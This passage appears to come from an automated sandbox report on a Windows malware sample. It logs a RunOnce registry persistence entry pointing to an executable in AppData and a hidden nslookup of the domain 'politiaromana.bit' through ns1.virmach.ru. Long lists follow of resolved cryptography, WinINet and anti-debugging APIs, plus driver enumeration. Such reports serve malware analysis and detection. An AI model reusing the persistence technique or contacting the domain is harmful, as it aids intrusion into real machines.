Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = yczsdfarmlf, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xb74, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Module (1131)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75bf0000 True 3
Fn
Load KERNEL32.dll base_address = 0x75bf0000 True 2
Fn
Load msvcr100.dll base_address = 0x70350000 True 1
Fn
Load USER32.dll base_address = 0x76110000 True 1
Fn
Load GDI32.dll base_address = 0x76710000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76310000 True 1
Fn
Load SHELL32.dll base_address = 0x74240000 True 1
Fn
Load CRYPT32.dll base_address = 0x76860000 True 1
Fn
Load WININET.dll base_address = 0x6fb50000 True 1
Fn
Load PSAPI.DLL base_address = 0x75640000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75bf0000 True 12
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77080000 True 5
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76310000 True 426
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75c0a980 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75c07570 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75c09e30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75c14ff0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x770df730 True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x770dd830 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x75c09950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x75c07a50 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x75c14bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75c07810 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x75c07600 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75c0a700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x75c15100 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75c17b30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75c08bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x75c07990 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x770e7a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75c03870 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75c16630 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75c17020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x75c16c50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x75c32430 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x75c0ab60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75c02af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75c01b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75c0a2b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75c078b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x75c02ad0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x75c03880 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75c07710 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x75c0a6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75c16aa0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x770d0e60 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75c0a740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75c0a720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75c16ca0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75c09b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75c038a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75c023e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75c07620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x75c0aac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x75c0a7e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75c0b0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75c09bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x75c32670 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x75c0a940 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75c16730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75c038c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x75c0a120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x75c01b70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x75c029d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75c0a040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x75c09bc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x770bf290 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x770bf210 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75c01ba0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75c0a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x75c08500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x75c15140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75c0a290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x75c07930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x75c08c10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x75c319a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x770b2bd0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x770aefe0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75c07950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x770abb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x75c09f30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x75c169b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75c16f60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75c16f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75c16890 True 2
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7036c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75c16740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x75c166a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x75c16700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75c0b040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75c0ace0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x770c7dc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x770d4010 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x770d2a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75c0a7b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x770d2290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x770d2910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x770f7a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x770eac00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x770da890 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x75c0ac80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x75c30830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x764c6270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x75c0fe80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x75c0ff80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x75c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x75c0a750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x75c31240 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x75c0ad60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x75c31460 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x75c09a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7644ded0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75c03630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75c16bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x75c16c40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x75c16a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75c0b1d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75c2d260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x75c16c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x75c166f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x75c16a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x770e1a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75c16820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75c15eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x770da200 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75c09fd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x75c10160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x75c08c30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x75c16800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x75c0cd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75c03690 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x75c16660 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75c0f640 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x75c00540 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x75c07830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x75c0d290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x75c17b50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75c16960 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75c07970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75c168e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75c169a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x75c0ac70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x75c146a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x75c169f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x75c15120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x75c16b60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x75c07590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x75c09b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75c2d170 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x75c099b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x75c09b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x75c08d60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x75c16a70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x75c09970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75c0ea30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75c099f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75c0f5a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x75c16b30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75c08c80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x75c0b000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76148a60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7613f890 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7612d9b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7612abd0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7612a740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x7618fec0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x76144f60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x76148a80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x73d314e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x76129580 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76148e60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76129860 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76125d90 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x761262e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x73d307e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x761383a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x761404a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76148cb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x73d31040 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x767b8830 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76330440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x7632f7f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x7632fa20 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7632f620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x7632fb30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76330590 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76346bf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76330650 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x7632faf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76346b30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76333910 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76330400 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76331030 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x7632f330 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x7632f350 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x7632f660 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x743dd9f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x743ef9c0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x743de690 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x7687d6d0 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x7687e0f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x6fc1d200 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x6fbcbec0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x6fc16ef0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x6fc045f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x6fbd0fd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x6fc18490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x6fbd7320 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x75641340 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x756413a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x7714d9b0 True 5
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x763310a0 True 426
Fn
Driver (253)
»
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 4521984 True 2
Fn
Get Name - load_address = 3104292864 True 2
Fn
Get Name - load_address = 3103821824 True 2
Fn
Get Name - load_address = 3089149952 True 2
Fn
Get Name - load_address = 1785528320 True 2
Fn
Get Name - load_address = 1786118144 True 2
Fn
Get Name - load_address = 1786183680 True 2
Fn
Get Name - load_address = 1778384896 True 2
Fn
Get Name - load_address = 1778581504 True 2
Fn
Get Name - load_address = 1778712576 True 2
Fn
Get Name - load_address = 1778778112 True 2
Fn
Get Name - load_address = 1778843648 True 2
Fn
Get Name - load_address = 1778909184 True 2
Fn
Get Name - load_address = 1779564544 True 2
Fn
Get Name - load_address = 1779957760 True 2
Fn
Get Name - load_address = 1780416512 True 2
Fn
Get Name - load_address = 1780613120 True 2
Fn
Get Name - load_address = 1781334016 True 2
Fn
Get Name - load_address = 1782185984 True 2
Fn
Get Name - load_address = 1782317056 True 2
Fn
Get Name - load_address = 1782513664 True 2
Fn
Get Name - load_address = 1782579200 True 2
Fn
Get Name - load_address = 1783234560 True 2
Fn
Get Name - load_address = 1783824384 True 2
Fn
Get Name - load_address = 1783889920 True 2
Fn
Get Name - load_address = 1784020992 True 2
Fn
Get Name - load_address = 1784086528 True 2
Fn
Get Name - load_address = 1784217600 True 2
Fn
Get Name - load_address = 1784283136 True 2
Fn
Get Name - load_address = 1784676352 True 2
Fn
Get Name - load_address = 1784807424 True 2
Fn
Get Name - load_address = 1784938496 True 2
Fn
Get Name - load_address = 1785069568 True 2
Fn
Get Name - load_address = 1797849088 True 2
Fn
Get Name - load_address = 1798438912 True 2
Fn
Get Name - load_address = 1798569984 True 2
Fn
Get Name - load_address = 1798963200 True 2
Fn
Get Name - load_address = 1799094272 True 2
Fn
Get Name - load_address = 1786773504 True 2
Fn
Get Name - load_address = 1787297792 True 2
Fn
Get Name - load_address = 1787428864 True 2
Fn
Get Name - load_address = 1787559936 True 2
Fn
Get Name - load_address = 1787822080 True 2
Fn
Get Name - load_address = 1790050304 True 2
Fn
Get Name - load_address = 1790115840 True 2
Fn
Get Name - load_address = 1791295488 True 2
Fn
Get Name - load_address = 1791819776 True 2
Fn
Get Name - load_address = 1792016384 True 2
Fn
Get Name - load_address = 1794506752 True 2
Fn
Get Name - load_address = 1794965504 True 2
Fn
Get Name - load_address = 1795162112 True 2
Fn
Get Name - load_address = 1795883008 True 2
Fn
Get Name - load_address = 1796341760 True 2
Fn
Get Name - load_address = 1796669440 True 2
Fn
Get Name - load_address = 1796931584 True 2
Fn
Get Name - load_address = 1797062656 True 2
Fn
Get Name - load_address = 1797586944 True 2
Fn
Get Name - load_address = 1802174464 True 2
Fn
Get Name - load_address = 1802305536 True 2
Fn
Get Name - load_address = 1802371072 True 2
Fn
Get Name - load_address = 1802436608 True 2
Fn
Get Name - load_address = 1802502144 True 2
Fn
Get Name - load_address = 1802633216 True 2
Fn
Get Name - load_address = 1814233088 True 2
Fn
Get Name - load_address = 1816264704 True 2
Fn
Get Name - load_address = 1816395776 True 2
Fn
Get Name - load_address = 1816526848 True 2
Fn
Get Name - load_address = 1816592384 True 2
Fn
Get Name - load_address = 1816788992 True 2
Fn
Get Name - load_address = 1816854528 True 2
Fn
Get Name - load_address = 1817182208 True 2
Fn
Get Name - load_address = 1817837568 True 2
Fn
Get Name - load_address = 1817968640 True 2
Fn
Get Name - load_address = 1805647872 True 2
Fn
Get Name - load_address = 1805778944 True 2
Fn
Get Name - load_address = 1806303232 True 2
Fn
Get Name - load_address = 1806893056 True 2
Fn
Get Name - load_address = 1806958592 True 2
Fn
Get Name - load_address = 1807024128 True 2
Fn
Get Name - load_address = 1807089664 True 2
Fn
Get Name - load_address = 1807155200 True 2
Fn
Get Name - load_address = 1807482880 True 2
Fn
Get Name - load_address = 1807745024 True 2
Fn
Get Name - load_address = 1807876096 True 2
Fn
Get Name - load_address = 1807941632 True 2
Fn
Get Name - load_address = 1808072704 True 2
Fn
Get Name - load_address = 1808203776 True 2
Fn
Get Name - load_address = 1808596992 True 2
Fn
Get Name - load_address = 1808793600 True 2
Fn
Get Name - load_address = 1809252352 True 2
Fn
Get Name - load_address = 1809383424 True 2
Fn
Get Name - load_address = 1810956288 True 2
Fn
Get Name - load_address = 1811021824 True 2
Fn
Get Name - load_address = 1811087360 True 2
Fn
Get Name - load_address = 1811152896 True 2
Fn
Get Name - load_address = 1811677184 True 2
Fn
Get Name - load_address = 1811742720 True 2
Fn
Get Name - load_address = 1812201472 True 2
Fn
Get Name - load_address = 1812267008 True 2
Fn
Get Name - load_address = 1812398080 True 2
Fn
Get Name - load_address = 1812594688 True 2
Fn
Get Name - load_address = 1812725760 True 2
Fn
Get Name - load_address = 1812791296 True 2
Fn
Get Name - load_address = 1812922368 True 2
Fn
Get Name - load_address = 1812987904 True 2
Fn
Get Name - load_address = 1813184512 True 2
Fn
Get Name - load_address = 1813446656 True 2
Fn
Get Name - load_address = 1813774336 True 2
Fn
Get Name - load_address = 1749221376 True 2
Fn
Get Name - load_address = 1738539008 True 2
Fn
Get Name - load_address = 1742274560 True 2
Fn
Get Name - load_address = 1813905408 True 2
Fn
Get Name - load_address = 1802764288 True 2
Fn
Get Name - load_address = 1743781888 True 2
Fn
Get Name - load_address = 1743847424 True 2
Fn
Get Name - load_address = 1813970944 True 1
Fn
Get Name - load_address = 1807351808 True 1
Fn
Get Name - load_address = 1810432000 True 1
Fn
Get Name - load_address = 1810563072 True 1
Fn
Get Name - load_address = 1810694144 True 1
Fn
Get Name - load_address = 1824194560 True 1
Fn
Get Name - load_address = 1825374208 True 1
Fn
Get Name - load_address = 1825570816 True 1
Fn
Get Name - load_address = 1826095104 True 1
Fn
Get Name - load_address = 1826357248 True 1
Fn
Get Name - load_address = 1826488320 True 1
Fn
Get Name - load_address = 1818230784 True 1
Fn
Get Name - load_address = 1818558464 True 1
Fn
Get Name - load_address = 1819344896 True 1
Fn
